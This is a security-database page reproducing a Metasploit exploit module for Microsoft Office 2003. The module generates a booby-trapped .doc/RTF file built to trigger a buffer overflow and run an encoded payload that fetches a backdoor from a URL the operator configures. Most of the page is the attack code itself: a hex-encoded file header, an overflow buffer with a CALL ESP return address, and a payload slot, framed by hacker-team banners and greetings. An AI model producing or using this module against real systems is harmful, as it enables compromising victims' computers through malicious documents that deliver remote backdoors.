Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKedAns-DzPACKETSTORM:109091
HistoryJan 25, 2012 - 12:00 a.m.

Microsoft Office 2003 .doc Buffer Overflow

2012-01-2500:00:00
KedAns-Dz
packetstormsecurity.com
18
JSON
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected] | [email protected]  
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)  
# Web Site : www.1337day.com  
# Facebook : http://facebook.com/KedAns   
# platform : windows ( local BOF via MSF)  
# Type : local exploit / Buffer Overflow / Metasploit  
###  
  
##  
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |  
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |  
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |  
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |  
# | ------------------------------------------------- < |  
###  
  
##  
# $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft Office 2003 (.doc) Command Exec and local BOF',  
'Description' => %q{  
This module exploits a buffer overflow in Microsoft Office 2003  
and Command Exec With .doc file .  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'b33f',  
'g11tch',  
'KedAns-Dz <ked-h[at]hotmail.com>' # MSF module  
],  
'Version' => '1.0',  
'References' =>  
[  
[ 'URL', 'http://exploit-db/exploits/18334' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "'",  
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,  
'EncoderOptions' =>  
{  
'BufferRegister' => 'ESI',  
}  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Microsoft Office 2003 - MSWord (.doc Heap Spray)', { 'Ret' => '' } ],  
],  
'DisclosureDate' => 'JAN 08 2012',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),  
OptString.new('URLBD', [ true, 'URL From the Backdoor.', 'http://']),  
], self.class)  
end  
  
def exploit  
# Encode the url.  
url = Rex::Text.to_unescape(datastore['URLBD'])  
  
# Header File  
file =  
"\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+  
"\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+  
"\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+  
"\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+  
"\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+  
"\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+  
"\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+  
"\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+  
"\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+  
"\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+  
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+  
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+  
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+  
"\x66\x66\x66\x66\x66\x66\x66\x66"  
# Buffer Overflow   
buf = "\x23" * 501  
buf << "\x30\x35"  
buf << "\x30" * 40  
buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP - WINWORD.exe  
buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2  
buf << rand_text_alpha(42)  
buf << "\x39\x30" * 18  
buf << payload.encoded  
  
# Create the doc  
doc = file  
doc << buf  
doc << url  
doc << "\x00"  
doc << "{}}}}}}"  
doc << "\x0d\x0a"  
doc << "}"  
  
print_status("Creating '#{datastore['FILENAME']}' file...")  
  
file_create(doc)  
end  
  
end  
  
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================  
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy   
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n  
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X  
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX  
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..  
#=================================================================================================`
JSON